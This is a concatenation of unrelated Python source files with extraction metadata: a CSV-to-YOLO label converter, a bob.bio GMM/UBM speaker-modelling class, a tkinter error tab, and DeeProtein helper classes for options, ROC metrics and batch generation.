] | [((1570, 1582), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (1577, 1582), False, 'from typing import List, TypeVar, Iterable\n'), ((3084, 3123), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '""""""'}), "(description='')\n", (3107, 3123), False, 'import argparse\n'), ((700, 725), 'os.path.join', 'join', (['self.path', 'vec_name'], {}), '(self.path, vec_name)\n', (704, 725), False, 'from os.path import join\n'), ((3415, 3429), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3427, 3429), False, 'from datetime import datetime\n'), ((3297, 3311), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3309, 3311), False, 'from datetime import datetime\n')] |
from os import path, makedirs
import os
import pandas as pd
import sys
import argparse
IMAGE_FOLDER = 'data/images'
DATA_CSV_FILE = 'images/out_data.csv'
YOLO_FILE = 'data/train.txt'
DATA_CLASSES='data/class.names'
def convert_Input_CSV_to_yolo(vott_df,labeldict=dict(zip(['Object'],[0,])),path='',target_name='data_train.txt',abs_path=False):
if not 'code' in vott_df.columns:
vott_df['code']=vott_df['label'].apply(lambda x: labeldict[x])
for col in vott_df[['xmin', 'ymin', 'xmax', 'ymax']]:
vott_df[col]=(vott_df[col]).apply(lambda x: round(x))
#Create Yolo Text file
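    # each output line: <image path> xmin,ymin,xmax,ymax,class [xmin,ymin,xmax,ymax,class ...]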
last_image = ''
txt_file = ''
for index,row in vott_df.iterrows():
if not last_image == row['image']:
if abs_path:
txt_file +='\n'+row['image_path'] + ' '
else:
txt_file +='\n'+os.path.join(path,row['image']) + ' '
txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())])
else:
txt_file += ' '
txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())])
last_image = row['image']
file = open(target_name,"w")
file.write(txt_file[1:])
file.close()
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--IMAGE_FOLDER", type=str, default=IMAGE_FOLDER,help = "Image folder path")
parser.add_argument("--DATA_CSV_FILE", type=str, default=DATA_CSV_FILE,help = "Input CSV file that store data")
parser.add_argument("--YOLO_FILE", type=str, default=YOLO_FILE,help = "data train yolo file name" )
args = parser.parse_args()
multi_df = pd.read_csv(args.DATA_CSV_FILE)
labels = multi_df['label'].unique()
labeldict = dict(zip(labels,range(len(labels))))
multi_df.drop_duplicates(subset=None, keep='first', inplace=True)
train_path = args.IMAGE_FOLDER
convert_Input_CSV_to_yolo(multi_df,labeldict,path = train_path,target_name=args.YOLO_FILE)
file = open(DATA_CLASSES,"w")
SortedLabelDict = sorted(labeldict.items() , key=lambda x: x[1])
for elem in SortedLabelDict:
file.write(elem[0]+'\n')
file.close()
| [
"os.path.join",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((1342, 1367), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1365, 1367), False, 'import argparse\n'), ((1737, 1768), 'pandas.read_csv', 'pd.read_csv', (['args.DATA_CSV_FILE'], {}), '(args.DATA_CSV_FILE)\n', (1748, 1768), True, 'import pandas as pd\n'), ((871, 903), 'os.path.join', 'os.path.join', (['path', "row['image']"], {}), "(path, row['image'])\n", (883, 903), False, 'import os\n')] |
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# <NAME> <<EMAIL>>
import logging
from multiprocessing.pool import ThreadPool
import numpy
import bob.core
import bob.io.base
import bob.learn.em
from bob.bio.base.algorithm import Algorithm
logger = logging.getLogger("bob.bio.gmm")
class GMM(Algorithm):
"""Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features.
Features must be normalized to zero mean and unit standard deviation."""
def __init__(
self,
# parameters for the GMM
number_of_gaussians,
# parameters of UBM training
kmeans_training_iterations=25, # Maximum number of iterations for K-Means
gmm_training_iterations=25, # Maximum number of iterations for ML GMM Training
training_threshold=5e-4, # Threshold to end the ML training
variance_threshold=5e-4, # Minimum value that a variance can reach
update_weights=True,
update_means=True,
update_variances=True,
# parameters of the GMM enrollment
relevance_factor=4, # Relevance factor as described in Reynolds paper
gmm_enroll_iterations=1, # Number of iterations for the enrollment phase
responsibility_threshold=0, # If set, the weight of a particular Gaussian will at least be greater than this threshold. In the case the real weight is lower, the prior mean value will be used to estimate the current mean and variance.
INIT_SEED=5489,
# scoring
scoring_function=bob.learn.em.linear_scoring,
n_threads=None,
):
"""Initializes the local UBM-GMM tool chain with the given file selector object"""
# call base class constructor and register that this tool performs projection
Algorithm.__init__(
self,
performs_projection=True,
use_projected_features_for_enrollment=False,
number_of_gaussians=number_of_gaussians,
kmeans_training_iterations=kmeans_training_iterations,
gmm_training_iterations=gmm_training_iterations,
training_threshold=training_threshold,
variance_threshold=variance_threshold,
update_weights=update_weights,
update_means=update_means,
update_variances=update_variances,
relevance_factor=relevance_factor,
gmm_enroll_iterations=gmm_enroll_iterations,
responsibility_threshold=responsibility_threshold,
INIT_SEED=INIT_SEED,
scoring_function=str(scoring_function),
multiple_model_scoring=None,
multiple_probe_scoring="average",
)
# copy parameters
self.gaussians = number_of_gaussians
self.kmeans_training_iterations = kmeans_training_iterations
self.gmm_training_iterations = gmm_training_iterations
self.training_threshold = training_threshold
self.variance_threshold = variance_threshold
self.update_weights = update_weights
self.update_means = update_means
self.update_variances = update_variances
self.relevance_factor = relevance_factor
self.gmm_enroll_iterations = gmm_enroll_iterations
self.init_seed = INIT_SEED
self.rng = bob.core.random.mt19937(self.init_seed)
self.responsibility_threshold = responsibility_threshold
self.scoring_function = scoring_function
self.n_threads = n_threads
self.pool = None
self.ubm = None
self.kmeans_trainer = bob.learn.em.KMeansTrainer()
self.ubm_trainer = bob.learn.em.ML_GMMTrainer(
self.update_means,
self.update_variances,
self.update_weights,
self.responsibility_threshold,
)
def _check_feature(self, feature):
"""Checks that the features are appropriate"""
if (
not isinstance(feature, numpy.ndarray)
or feature.ndim != 2
or feature.dtype != numpy.float64
):
raise ValueError("The given feature is not appropriate")
if self.ubm is not None and feature.shape[1] != self.ubm.shape[1]:
raise ValueError(
"The given feature is expected to have %d elements, but it has %d"
% (self.ubm.shape[1], feature.shape[1])
)
#######################################################
# UBM training #
def train_ubm(self, array):
logger.debug(" .... Training with %d feature vectors", array.shape[0])
if self.n_threads is not None:
self.pool = ThreadPool(self.n_threads)
# Computes input size
input_size = array.shape[1]
# Creates the machines (KMeans and GMM)
logger.debug(" .... Creating machines")
kmeans = bob.learn.em.KMeansMachine(self.gaussians, input_size)
self.ubm = bob.learn.em.GMMMachine(self.gaussians, input_size)
# Trains using the KMeansTrainer
logger.info(" -> Training K-Means")
        # Resetting the pseudo random number generator so we can have the same initialization for serial and parallel execution.
self.rng = bob.core.random.mt19937(self.init_seed)
bob.learn.em.train(
self.kmeans_trainer,
kmeans,
array,
self.kmeans_training_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
variances, weights = kmeans.get_variances_and_weights_for_each_cluster(array)
means = kmeans.means
# Initializes the GMM
self.ubm.means = means
self.ubm.variances = variances
self.ubm.weights = weights
self.ubm.set_variance_thresholds(self.variance_threshold)
# Trains the GMM
logger.info(" -> Training GMM")
        # Resetting the pseudo random number generator so we can have the same initialization for serial and parallel execution.
self.rng = bob.core.random.mt19937(self.init_seed)
bob.learn.em.train(
self.ubm_trainer,
self.ubm,
array,
self.gmm_training_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
def save_ubm(self, projector_file):
"""Save projector to file"""
# Saves the UBM to file
logger.debug(" .... Saving model to file '%s'", projector_file)
hdf5 = (
projector_file
if isinstance(projector_file, bob.io.base.HDF5File)
else bob.io.base.HDF5File(projector_file, "w")
)
self.ubm.save(hdf5)
def train_projector(self, train_features, projector_file):
"""Computes the Universal Background Model from the training ("world") data"""
[self._check_feature(feature) for feature in train_features]
logger.info(
" -> Training UBM model with %d training files", len(train_features)
)
# Loads the data into an array
array = numpy.vstack(train_features)
self.train_ubm(array)
self.save_ubm(projector_file)
#######################################################
# GMM training using UBM #
def load_ubm(self, ubm_file):
hdf5file = bob.io.base.HDF5File(ubm_file)
# read UBM
self.ubm = bob.learn.em.GMMMachine(hdf5file)
self.ubm.set_variance_thresholds(self.variance_threshold)
def load_projector(self, projector_file):
"""Reads the UBM model from file"""
# read UBM
self.load_ubm(projector_file)
# prepare MAP_GMM_Trainer
kwargs = (
dict(
mean_var_update_responsibilities_threshold=self.responsibility_threshold
)
if self.responsibility_threshold > 0.0
else dict()
)
self.enroll_trainer = bob.learn.em.MAP_GMMTrainer(
self.ubm,
relevance_factor=self.relevance_factor,
update_means=True,
update_variances=False,
**kwargs
)
self.rng = bob.core.random.mt19937(self.init_seed)
def project_ubm(self, array):
logger.debug(" .... Projecting %d feature vectors" % array.shape[0])
# Accumulates statistics
gmm_stats = bob.learn.em.GMMStats(self.ubm.shape[0], self.ubm.shape[1])
self.ubm.acc_statistics(array, gmm_stats)
# return the resulting statistics
return gmm_stats
def project(self, feature):
"""Computes GMM statistics against a UBM, given an input 2D numpy.ndarray of feature vectors"""
self._check_feature(feature)
return self.project_ubm(feature)
def read_gmm_stats(self, gmm_stats_file):
"""Reads GMM stats from file."""
return bob.learn.em.GMMStats(bob.io.base.HDF5File(gmm_stats_file))
def read_feature(self, feature_file):
"""Read the type of features that we require, namely GMM_Stats"""
return self.read_gmm_stats(feature_file)
def enroll_gmm(self, array):
logger.debug(" .... Enrolling with %d feature vectors", array.shape[0])
gmm = bob.learn.em.GMMMachine(self.ubm)
gmm.set_variance_thresholds(self.variance_threshold)
bob.learn.em.train(
self.enroll_trainer,
gmm,
array,
self.gmm_enroll_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
return gmm
def enroll(self, feature_arrays):
"""Enrolls a GMM using MAP adaptation, given a list of 2D numpy.ndarray's of feature vectors"""
[self._check_feature(feature) for feature in feature_arrays]
array = numpy.vstack(feature_arrays)
# Use the array to train a GMM and return it
return self.enroll_gmm(array)
######################################################
# Feature comparison #
def read_model(self, model_file):
"""Reads the model, which is a GMM machine"""
return bob.learn.em.GMMMachine(bob.io.base.HDF5File(model_file))
def score(self, model, probe):
"""Computes the score for the given model and the given probe using the scoring function from the config file"""
assert isinstance(model, bob.learn.em.GMMMachine)
assert isinstance(probe, bob.learn.em.GMMStats)
return self.scoring_function(
[model], self.ubm, [probe], [], frame_length_normalisation=True
)[0][0]
def score_for_multiple_probes(self, model, probes):
"""This function computes the score between the given model and several given probe files."""
assert isinstance(model, bob.learn.em.GMMMachine)
for probe in probes:
assert isinstance(probe, bob.learn.em.GMMStats)
# logger.warn("Please verify that this function is correct")
return self.probe_fusion_function(
self.scoring_function(
[model], self.ubm, probes, [], frame_length_normalisation=True
)
)
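# Usage sketch (editorial addition, not part of the original module): the typical
# projector/enrollment flow of the GMM class above. The file names, feature arrays and the
# constructor argument are hypothetical; only the method names defined above are assumed.
#
#   algo = GMM(512)                                            # nr of Gaussians; see __init__ above
#   algo.train_projector(train_features, 'Projector.hdf5')     # fits the UBM on 2D float64 arrays
#   algo.load_projector('Projector.hdf5')                      # loads the UBM and prepares the MAP trainer
#   model = algo.enroll(client_feature_arrays)                 # MAP-adapted client GMM
#   probe_stats = algo.project(probe_feature)                  # GMMStats of the probe against the UBM
#   s = algo.score(model, probe_stats)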
class GMMRegular(GMM):
"""Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features"""
def __init__(self, **kwargs):
"""Initializes the local UBM-GMM tool chain with the given file selector object"""
# logger.warn("This class must be checked. Please verify that I didn't do any mistake here. I had to rename 'train_projector' into a 'train_enroller'!")
# initialize the UBMGMM base class
GMM.__init__(self, **kwargs)
# register a different set of functions in the Tool base class
Algorithm.__init__(
self, requires_enroller_training=True, performs_projection=False
)
#######################################################
# UBM training #
def train_enroller(self, train_features, enroller_file):
"""Computes the Universal Background Model from the training ("world") data"""
train_features = [feature for client in train_features for feature in client]
return self.train_projector(train_features, enroller_file)
#######################################################
# GMM training using UBM #
def load_enroller(self, enroller_file):
"""Reads the UBM model from file"""
return self.load_projector(enroller_file)
######################################################
# Feature comparison #
def score(self, model, probe):
"""Computes the score for the given model and the given probe.
        The scores are log-likelihoods.
Therefore, the log of the likelihood ratio is obtained by computing the following difference."""
assert isinstance(model, bob.learn.em.GMMMachine)
self._check_feature(probe)
score = sum(
model.log_likelihood(probe[i, :]) - self.ubm.log_likelihood(probe[i, :])
for i in range(probe.shape[0])
)
return score / probe.shape[0]
def score_for_multiple_probes(self, model, probes):
raise NotImplementedError("Implement Me!")
| [
"logging.getLogger",
"bob.bio.base.algorithm.Algorithm.__init__",
"numpy.vstack",
"multiprocessing.pool.ThreadPool"
] | [((261, 293), 'logging.getLogger', 'logging.getLogger', (['"""bob.bio.gmm"""'], {}), "('bob.bio.gmm')\n", (278, 293), False, 'import logging\n'), ((7120, 7148), 'numpy.vstack', 'numpy.vstack', (['train_features'], {}), '(train_features)\n', (7132, 7148), False, 'import numpy\n'), ((9856, 9884), 'numpy.vstack', 'numpy.vstack', (['feature_arrays'], {}), '(feature_arrays)\n', (9868, 9884), False, 'import numpy\n'), ((11800, 11888), 'bob.bio.base.algorithm.Algorithm.__init__', 'Algorithm.__init__', (['self'], {'requires_enroller_training': '(True)', 'performs_projection': '(False)'}), '(self, requires_enroller_training=True,\n performs_projection=False)\n', (11818, 11888), False, 'from bob.bio.base.algorithm import Algorithm\n'), ((4674, 4700), 'multiprocessing.pool.ThreadPool', 'ThreadPool', (['self.n_threads'], {}), '(self.n_threads)\n', (4684, 4700), False, 'from multiprocessing.pool import ThreadPool\n')] |
import logging
from tkinter import ttk
from modlunky2.ui.widgets import Tab
logger = logging.getLogger("modlunky2")
class ErrorTab(Tab):
def __init__(self, tab_control, *args, **kwargs):
super().__init__(tab_control, *args, **kwargs)
self.tab_control = tab_control
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.label = ttk.Label(
self, text="Failed to load this tab... See console for more details."
)
self.label.grid(row=1, column=0, pady=5, padx=5, sticky="nswe")
| [
"logging.getLogger",
"tkinter.ttk.Label"
] | [((88, 118), 'logging.getLogger', 'logging.getLogger', (['"""modlunky2"""'], {}), "('modlunky2')\n", (105, 118), False, 'import logging\n'), ((394, 479), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'text': '"""Failed to load this tab... See console for more details."""'}), "(self, text='Failed to load this tab... See console for more details.'\n )\n", (403, 479), False, 'from tkinter import ttk\n')] |
import matplotlib
matplotlib.use('Agg')
import tensorflow as tf
import numpy as np
import re, os
import random
import math
import json
import tarfile
import matplotlib.pyplot as plt
import sklearn.metrics
from seaborn import barplot, set_style
from sklearn.preprocessing import OneHotEncoder
from collections import OrderedDict
from matplotlib import font_manager
class OptionHandler():
"""This Class holds all the Options from the config.JSON. The Attributes of this class are directly accessed
by DeeProtein, the BatchGenerator, the ROCtracker and the TFrecordsgenerator.
Attributes:
        config: A `dict` holding all the global parameters. This is read from config.JSON.
_name: A `str` holding the model name.
_thresholdnum: `int32`, nr of thresholds to use to calculate the ROC/PR metrics.
_gpu: `int32`, which gpu to use in multiGPU context.
_allowsoftplacement: `str` if 'True' the Variables can be moved to CPU.
        _numepochs: `int32` the number of epochs to calculate. DEPRECATED. Use numsteps instead.
        _numsteps: `int32` the number of steps to run the model.
        _embeddingdim: `int32` the dimension of the protein embedding generated by Deeprotein.generate_embedding().
        _depth: `int32` the input depth, i.e. the nr of amino acids. Defaults to 20.
_structuredims: `int32` the nr of structural elements to consider in the structure embedding.
_traindata: `str` the path to the traindataset.
_validdata: `str` the path to the validdataset.
_batchesdir: `str` the path to the examples directory.
_inferencemode: `str` if 'True' model is initialized in inference mode.
        _labels: `str` the type of labels to use; must be one of ['EC', 'GO']. Until now only 'GO' is fully implemented.
_nclasses: `int32` the number of classes to consider. This number must match the line number in the EC_file.
_classbalancing: `str` if 'True' the classes are weighted for their size/their importance during training.
_maxclassinbalance: `int32` the maximum weight a class can obtain.
_dropoutrate: `float32` the dropout to assign to fully connected layers.
_learningrate: `float32` the learningrate.
_epsilon: `float32` the epsilon parameter of the Adam optimizer.
        _batchsize: `int32` the batchsize to apply in training and validation mode.
_batchgenmode: `str` currently only one option is available: 'one_hot_padded'
_windowlength: `int32` the length of the window to apply on a sequence.
_minlength: `int32` the minlength a sequence must have to be included in the dataset.
_numthreads: `int32` the number of threads to use in the inputpipeline.
        _restorepath: `str` the path from which to restore the model.
_restore: `str` if 'True' the model is restored from the path specified in the restorepath.
_debug: `str` if 'True' the model is initialized in the debug mode.
_ec_file: `str` the path to the EC_file, holding all labels and the label sizes.
_summariesdir: `str` the directory where to store the model and to write the summaries.
"""
def __init__(self, config_dict):
self.config = config_dict
self._name = config_dict['model_name']
self._thresholdnum = config_dict['threshold_num']
self._gpu = config_dict['gpu']
self._allowsoftplacement = config_dict['allow_softplacement']
self._numepochs = config_dict['num_epochs']
self._numsteps = config_dict['num_steps']
self._depth = config_dict['depth']
self._structuredims = config_dict['structure_dims']
self._traindata = config_dict['train_data']
self._validdata = config_dict['valid_data']
self._batchesdir = config_dict['batches_dir']
self._inferencemode = True if config_dict['inference_mode'] == 'True' else False
self._labels = config_dict['labels']
self._nclasses = config_dict['n_classes']
self._classbalancing = True if config_dict['class_balancing'] == 'True' else False
self._maxclassinbalance = config_dict['maxclass_inbalance']
self._dropoutrate = config_dict['dropoutrate']
self._learningrate = config_dict['learning_rate']
self._epsilon = config_dict['epsilon']
self._batchsize = config_dict['batch_size']
self._batchgenmode = config_dict['batchgen_mode']
self._windowlength = config_dict['window_length']
self._minlength = config_dict['min_length']
self._numthreads = config_dict['num_threads'] #TODO ASSERT THIS NUMBER!!!!!!!!
self._restorepath = config_dict['restore_path']
self._restore = True if config_dict['restore'] == 'True' else False
self._debug = True if config_dict['debug'] == 'True' else False
self._ecfile = config_dict['EC_file']
self._summariesdir = config_dict['summaries_dir'] # for tensorboard
self._summariesdir = self._summariesdir + \
'_{l}_{n}_{w}_{g}_{b}_{lr}_{e}'.format(g=self._batchgenmode,
w=self._windowlength,
n=self._nclasses,
b=self._batchsize,
lr=self._learningrate,
e=self._epsilon,
l=self._labels)
if not os.path.exists(self._summariesdir):
os.makedirs(self._summariesdir)
if not os.path.exists(self._batchesdir):
os.makedirs(self._batchesdir)
def write_dict(self):
"""Store the config_dict on disc in the save_dir.
"""
with open(os.path.join(self._summariesdir, 'config_dict.JSON'), "w") as config_dict:
json.dump(self.config, config_dict)
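# Usage sketch (editorial addition): building an OptionHandler from a config.JSON on disk.
# The file name below is hypothetical; the keys must match the ones read in __init__ above.
#
#   import json
#   with open('config.JSON', 'r') as fobj:
#       config = json.load(fobj)
#   opts = OptionHandler(config)
#   opts.write_dict()   # persists the resolved options into opts._summariesdir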
class RocTracker():
"""This class calculates comprehensive metrics for the validation of the performace of DeeProtein.
The calculated metrics include Area under the ROC-Curve and AUC under the Precision/recall-curve.
Attributes:
_opts: A `helpers.OptionHandler` defining the global preferences.
metrics_path: `str` the path to the metrics folder.
metrics_file: `str` file to the metrics.csv where the most recent metrics are stored.
roc_score: `Array` holding the logits of the model for each validation batch.
roc_labels: `Array` holding the labels of the model for each validation batch.
pred_positives_sum: `Array` holding the positive predictions for each class.
actual_positives_sum: `Array` holding the condition positives predictions for each class.
true_positives_sum: `Array` holding the true positives predictions for each class.
num_calculations: `int32` as a counter.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
self.metrics_path = os.path.join(self._opts._summariesdir, 'metrics')
if not os.path.exists(self.metrics_path):
os.mkdir(self.metrics_path)
self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w")
self.roc_score = []
self.roc_labels = []
self.pred_positives_sum = np.zeros(self._opts._nclasses)
self.actual_positives_sum = np.zeros(self._opts._nclasses)
self.true_positive_sum = np.zeros(self._opts._nclasses)
self.num_calculations = 0
try:
plt.style.use(json.load(
open('/net/data.isilon/igem/2017/scripts/clonedDeeProtein/DeeProtein/style.json', 'r')))
self.font = font_manager.FontProperties(
fname='/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff')
self.monospaced = font_manager.FontProperties(
fname='/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf')
except:
pass
def update(self, sigmoid_logits, true_labels):
"""Update the ROC tracker, with the predictions on one batch made during validation.
Args:
            sigmoid_logits: `np.Array` and 2D array holding the sigmoid logits for the validation batch.
            true_labels: `np.Array` and 2D array holding the true labels for the validation batch.
"""
# threshold this thing
        # we consider a class "predicted" if its sigmoid activation is higher than 0.5 (predicted labels)
batch_predicted_labels = np.greater(sigmoid_logits, 0.5)
batch_predicted_labels = batch_predicted_labels.astype(float)
batch_pred_pos = np.sum(batch_predicted_labels, axis=0) #sum up along the batch dim, keep the channels
batch_actual_pos = np.sum(true_labels, axis=0) #sum up along the batch dim, keep the channels
# calculate the true positives:
batch_true_pos = np.sum(np.multiply(batch_predicted_labels, true_labels), axis=0)
# and update the counts
self.pred_positives_sum += batch_pred_pos #what the model said
self.actual_positives_sum += batch_actual_pos #what the labels say
self.true_positive_sum += batch_true_pos # where labels and model predictions>0.5 match
assert len(self.true_positive_sum) == self._opts._nclasses
# add the predictions to the roc_score tracker
self.roc_score.append(sigmoid_logits)
self.roc_labels.append(true_labels)
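    # Toy illustration (editorial addition) of what update() accumulates for a 2-sample,
    # 3-class validation batch; the numbers are made up.
    #
    #   sigmoid_logits = np.array([[0.9, 0.2, 0.6],
    #                              [0.1, 0.8, 0.4]])
    #   true_labels    = np.array([[1., 0., 1.],
    #                              [0., 1., 0.]])
    #   np.greater(sigmoid_logits, 0.5)              # -> predicted labels per class
    #   np.sum(true_labels, axis=0)                  # -> condition positives per class
    #   np.sum(predictions * true_labels, axis=0)    # -> true positives per class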
def calc_and_save(self, logfile):
"""Calculate the ROC curve with AUC value for the collected test values (roc_scores, roc_labels).
Writes everything to files, plots curves and resets the Counters afterwards.
Args:
logfile: `file-object` the logfile of the DeeProtein model.
"""
self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w")
self.num_calculations += 1
# concat score and labels along the batchdim -> a giant test batch
self.roc_score = np.concatenate(self.roc_score, axis=0)
self.roc_labels = np.concatenate(self.roc_labels, axis=0)
# get the total number of seqs we tested on:
logfile.write('[*] Calculating metrics\n')
test_set_size = self.roc_labels.shape[0]
# do the calculations
fpr, tpr, thresholds = sklearn.metrics.roc_curve(y_true=np.reshape(self.roc_labels, (-1)),
y_score=np.reshape(self.roc_score, (-1)))
auc = sklearn.metrics.auc(fpr, tpr)
precision_arr, recall_arr, thresholds = sklearn.metrics.precision_recall_curve(
y_true=np.reshape(self.roc_labels, (-1)), probas_pred=np.reshape(self.roc_score, (-1)))
# write get the max, min and avg scores for each class:
# determine the scores for the labels
scores = self.roc_score * self.roc_labels
mean_scores = np.mean(scores, axis=0)
assert mean_scores.shape[0] == self._opts._nclasses
max_scores = np.amax(scores, axis=0)
assert max_scores.shape[0] == self._opts._nclasses
min_scores = np.amin(scores, axis=0)
assert min_scores.shape[0] == self._opts._nclasses
self.metrics_file.write(str(mean_scores) + '\n')
self.metrics_file.write(str(max_scores) + '\n')
self.metrics_file.write(str(min_scores) + '\n')
self.metrics_file.close()
# get printable metrics (for log file):
# where predPositives_sum == 0, tp_sum is also 0
precision_class = self.true_positive_sum / np.maximum(1, self.pred_positives_sum)
# where actualPositives_sum == 0, tp_sum is also 0
recall_class = self.true_positive_sum / np.maximum(1, self.actual_positives_sum)
precision = np.sum(self.true_positive_sum) / np.sum(self.pred_positives_sum)
recall = np.sum(self.true_positive_sum) / np.sum(self.actual_positives_sum)
f1 = 2*precision*recall / (precision + recall)
logfile.write("[*] Tested on %d seqs, "
"precision %.2f%%, "
"recall %.2f%%, "
"F1 %.2f%%\n" % (test_set_size, precision, recall, f1))
logfile.flush()
#plot ROC:
self.plot_simple_curve(x=fpr, y=tpr, title=self._opts._name + '_ROC_curve',
legend=self._opts._name + ' (AUC = %0.4f)' % auc,
xname='False positive rate', yname='True positive rate',
filename=os.path.join(self.metrics_path, self._opts._name +
'.roc_%d' % self.num_calculations))
# PR curve
self.plot_simple_curve(x=recall_arr, y=precision_arr,
title=self._opts._name + ' PR curve', legend=self._opts._name,
xname='Recall', yname='Precision',
filename=os.path.join(self.metrics_path, self._opts._name +
'.precision_%d' % self.num_calculations),
include_linear=False)
# reset the stats-collectors:
self.roc_score = []
self.roc_labels = []
self.pred_positives_sum = np.zeros(self._opts._nclasses)
self.actual_positives_sum = np.zeros(self._opts._nclasses)
logfile.write('[*] Done testing.\n')
def plot_simple_curve(self, x, y, title, legend, xname, yname, filename, include_linear=True, iGEM_style=True):
"""Plots simple curve in the iGEM style if wanted.
Args:
x: `Array1d`, what to plot on the x-Axis.
y: `Array1d` what to plot on the y-Axis.
title: `str`, the title.
legend:`str`, the legend.
xname: `str`, the name of the x axis.
yname: `str`, the name of the y axis.
filename: `str`, path to the file where to save the plot.
include_linear: `bool`, whether to plot a linear line with slope=1.
iGEM_style: `bool`, whether to plot in the iGEM-Heidelberg style layout.
"""
plt.ioff()
fig = plt.figure(1, figsize=(5, 5), dpi=200)
plt.plot(x, y, color='#005493', lw=2, label=legend)
if include_linear:
plt.plot([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle="--")
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
if iGEM_style:
plt.title(title, fontproperties=self.font)
plt.xlabel(xname, fontproperties=self.font)
plt.ylabel(yname, fontproperties=self.font)
plt.legend(loc="lower right", prop=self.font)
else:
plt.title(title)
plt.xlabel(xname)
plt.ylabel(yname)
plt.legend(loc="lower right")
plt.savefig(filename+".svg")
plt.savefig(filename+".png")
plt.close(fig)
def _count_lines(file_path):
"""Count lines in a file.
A line counter. Counts the lines in given file with counter count counts.
Args:
file_path: `str` path to file where to count the lines.
"""
count = 0
with open(file_path, "r") as fobj:
for line in fobj:
count += 1
return count
class StratifiedCounterDict(dict):
def __missing__(self, key):
self[key] = {'tp': 0,
'pred_p': 0,
}
return self[key]
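# Example (editorial addition): the dict creates a fresh per-label counter on first access,
# so per-class statistics can be accumulated without explicit initialisation. The GO term
# below is only an illustration.
#
#   counts = StratifiedCounterDict()
#   counts['GO:0003824']['tp'] += 1       # -> {'GO:0003824': {'tp': 1, 'pred_p': 0}}
#   counts['GO:0003824']['pred_p'] += 1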
class BatchGenerator():
"""Batchgenerator of the DeeProtein model.
This Class generates the life batches for inference and holds important information such as the class_dict
and the embedding_dict.
It further can be used to perform tests on a model by generating batches of garbage sequences or batches of
sequences for inference.
Attributes:
_opts: A `helpers.OptionHandler` holding the global options for the module.
mode: A `str`. Has to be one of ['one_hot_padded']
inferencedata: A `fileObject` the file from which to infer.
traindata: A `fileObject` the file from which to train.
validdata: A `fileObject` the file from which to evaluate.
AA_to_id: A `dict` mapping single letter AAs to integers.
id_to_AA: A `dict` the reverse of AA_to_id.
        class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specified
          in the config_dict.
        id_to_class: An `OrderedDict` the reverse class_dict.
        embedding_dict: An `OrderedDict` mapping sequence names to the index in the protein embedding.
        garbage_percentage: A `float32` defining the fraction of garbage sequences to incorporate in the dataset.
        garbage_count: A `int32` used to count the nr of garbage sequences that have been written.
        eval_batch_nr: A `int32`, the nr of batches needed for complete evaluation of the valid set.
        batches_per_file: A `int32`, the nr of batches included in a tf.Records file.
        epochs: A `int32` defining the nr of epochs to train.
        curr_epoch: A `int32` counter for the epochs.
label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels.
AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
        self.mode = self._opts._batchgenmode # currently only 'one_hot_padded' is supported
self.traindata = open(self._opts._traindata, 'r')
self.validdata = open(self._opts._validdata, 'r')
self.AA_to_id = {}
self.id_to_AA = {}
self.class_dict = OrderedDict()
self.id_to_class = OrderedDict()
self._get_class_dict()
self.embedding_dict = OrderedDict()
# determine the number of batches for eval from lines in the validdata and the garbagepercentage
self.garbage_percentage = 0.2
self.garbage_count = 0 # a counter for generated garbage sequences
self.eval_batch_nr = int(_count_lines(self._opts._validdata) * (1 + self.garbage_percentage) //
self._opts._batchsize)
print('Initialized Batchgen with batchsize: %d, numeval_batches: %d at'
' garbage_percentage: %f' % (self._opts._batchsize,
self.eval_batch_nr,
self.garbage_percentage))
self.batches_per_file = 10000
self.epochs = 2000
self.curr_epoch = 0
self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False)
self.AA_enc = 'where we put the encoder for the AAs'
if self.mode.startswith('one_hot'):
AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',]
self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False)
if 'physchem' in self.mode: #this is to be implemented.
_hydro = [1.8, 2.5, -3.5, -3.5, 2.8,
-0.4, -3.2, 4.5, -3.9, 3.8,
1.9, -3.5, -1.6, -3.5, -4.5,
-0.8, -0.7, 4.2, -0.9, -1.3]
_molarweight = [89.094, 121.154, 133.104, 147.131, 165.192,
75.067, 155.156, 131.175, 146.189, 131.175,
149.208, 132.119, 115.132, 146.146, 174.203,
105.093, 119.119, 117.148, 204.228, 181.191]
            # membership must be tested against the string of residues, not a one-element list
            _is_polar = lambda aa: 1 if aa in 'DEHKNQRSTY' else 0
            _is_aromatic = lambda aa: 1 if aa in 'FWY' else 0
            _has_hydroxyl = lambda aa: 1 if aa in 'ST' else 0 #should we add TYR??
            _has_sulfur = lambda aa: 1 if aa in 'CM' else 0
for i, aa in enumerate(AAs):
